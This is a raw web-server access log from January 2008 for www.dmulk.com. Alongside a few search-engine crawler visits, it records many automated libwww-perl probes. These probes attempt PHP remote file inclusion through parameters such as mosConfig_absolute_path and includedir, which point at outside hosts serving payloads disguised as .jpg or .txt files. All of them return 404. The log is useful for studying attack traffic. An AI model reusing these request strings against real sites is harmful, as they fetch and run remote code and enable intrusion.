74.6.20.29 - - [03/Jan/2008:07:14:36 -0800] "GET /minamijewelry/html/wind.html HTTP/1.0" 200 20883 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:07:18:31 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:07:18:31 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:07:18:31 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:07:18:31 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:07:18:32 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:07:18:32 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:07:18:32 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:07:18:32 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:07:18:32 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:07:18:33 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:07:18:34 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:07:18:34 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [03/Jan/2008:07:18:35 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [03/Jan/2008:07:18:35 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [03/Jan/2008:07:18:35 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [03/Jan/2008:07:18:35 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [03/Jan/2008:07:18:35 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [03/Jan/2008:07:18:35 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [03/Jan/2008:07:18:36 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [03/Jan/2008:07:18:36 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.202.121 - - [03/Jan/2008:07:18:36 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.202.121 - - [03/Jan/2008:07:18:36 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:07:18:37 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:07:18:37 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.202.121 - - [03/Jan/2008:07:18:37 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.202.121 - - [03/Jan/2008:07:18:37 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:07:18:37 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:07:18:37 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:07:18:37 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:07:18:38 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.workinghome2004.com//chat/inc/langs/fr.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:07:18:38 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:07:18:38 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.workinghome2004.com//chat/inc/langs/fr.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:07:18:38 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:07:18:38 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.workinghome2004.com//chat/inc/langs/fr.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.202.121 - - [03/Jan/2008:07:18:38 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.202.121 - - [03/Jan/2008:07:18:38 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.202.121 - - [03/Jan/2008:07:18:38 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.202.121 - - [03/Jan/2008:07:18:39 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:07:18:39 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.workinghome2004.com//chat/inc/langs/fr.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:07:18:39 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.12 - - [03/Jan/2008:07:18:39 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [03/Jan/2008:07:18:39 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.202.121 - - [03/Jan/2008:07:18:39 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.202.121 - - [03/Jan/2008:07:18:39 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.26.63.12 - - [03/Jan/2008:07:18:39 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [03/Jan/2008:07:18:40 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.148.232.33 - - [03/Jan/2008:07:18:57 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.148.232.33 - - [03/Jan/2008:07:18:57 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:07:18:59 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:07:18:59 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:07:18:59 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:07:18:59 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:07:18:59 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:07:19:00 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:07:19:02 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:07:19:02 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:07:19:02 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:07:19:02 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:07:19:07 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:07:19:07 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.82 - - [03/Jan/2008:07:20:58 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.175.17.27 - - [03/Jan/2008:07:21:17 -0800] "GET /logs/scripts.log//////////////ws/get_reminders.php?includedir=http://jorgevolio.com/.cookies/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.175.17.27 - - [03/Jan/2008:07:21:18 -0800] "GET //////////////ws/get_reminders.php?includedir=http://jorgevolio.com/.cookies/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.175.17.27 - - [03/Jan/2008:07:21:18 -0800] "GET /logs//////////////ws/get_reminders.php?includedir=http://jorgevolio.com/.cookies/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:07:22:21 -0800] "GET /logs/access_071210.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:07:22:21 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:07:22:21 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.148.232.33 - - [03/Jan/2008:07:22:45 -0800] "GET /logs/access_071219.log//aedating4CMS.php?dir[inc]=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.148.232.33 - - [03/Jan/2008:07:22:45 -0800] "GET //aedating4CMS.php?dir[inc]=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.148.232.33 - - [03/Jan/2008:07:22:45 -0800] "GET /logs//aedating4CMS.php?dir[inc]=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:07:22:56 -0800] "GET /logs/access_071220.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:07:22:56 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:07:22:57 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:07:23:29 -0800] "GET /logs/access_071220.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.workinghome2004.com//chat/inc/langs/fr.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:07:23:29 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.workinghome2004.com//chat/inc/langs/fr.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:07:23:30 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.workinghome2004.com//chat/inc/langs/fr.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:07:24:01 -0800] "GET /logs/access_071210.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:07:24:01 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:07:24:02 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.175.17.27 - - [03/Jan/2008:07:24:53 -0800] "GET /logs/access_071224.log//////////////ws/get_reminders.php?includedir=http://jorgevolio.com/.cookies/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:07:25:15 -0800] "GET /logs/access_071214.log//aedating4CMS.php?dir[inc]=http://www.workinghome2004.com//chat/inc/langs/fr.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:07:25:16 -0800] "GET //aedating4CMS.php?dir[inc]=http://www.workinghome2004.com//chat/inc/langs/fr.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:07:25:17 -0800] "GET /logs//aedating4CMS.php?dir[inc]=http://www.workinghome2004.com//chat/inc/langs/fr.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.104 - - [03/Jan/2008:07:30:51 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.104 - - [03/Jan/2008:07:30:51 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.24.203 - - [03/Jan/2008:07:31:44 -0800] "GET /megumi/?D=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.175.17.27 - - [03/Jan/2008:07:32:39 -0800] "GET /logs/access_071224.log//////////////ws/get_reminders.php?includedir=http://jorgevolio.com/.cookies/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.175.17.27 - - [03/Jan/2008:07:32:40 -0800] "GET //////////////ws/get_reminders.php?includedir=http://jorgevolio.com/.cookies/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.175.17.27 - - [03/Jan/2008:07:32:40 -0800] "GET /logs//////////////ws/get_reminders.php?includedir=http://jorgevolio.com/.cookies/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:07:33:58 -0800] "GET /logs/access_071214.log/tools/send_reminders.php?noSet=0&includedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:07:33:59 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:07:33:59 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:07:34:06 -0800] "GET /logs/access_071220.log/tools/send_reminders.php?noSet=0&includedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.24.81 - - [03/Jan/2008:07:36:31 -0800] "GET /plans/?D=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.55.209.204 - - [03/Jan/2008:07:37:29 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.204 - - [03/Jan/2008:07:37:29 -0800] "GET /bikes/?D=A HTTP/1.0" 200 2036 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
216.175.17.27 - - [03/Jan/2008:07:37:45 -0800] "GET /logs/access_071224.log//////////////ws/get_reminders.php?includedir=http://jorgevolio.com/.cookies/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.175.17.27 - - [03/Jan/2008:07:37:45 -0800] "GET //////////////ws/get_reminders.php?includedir=http://jorgevolio.com/.cookies/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
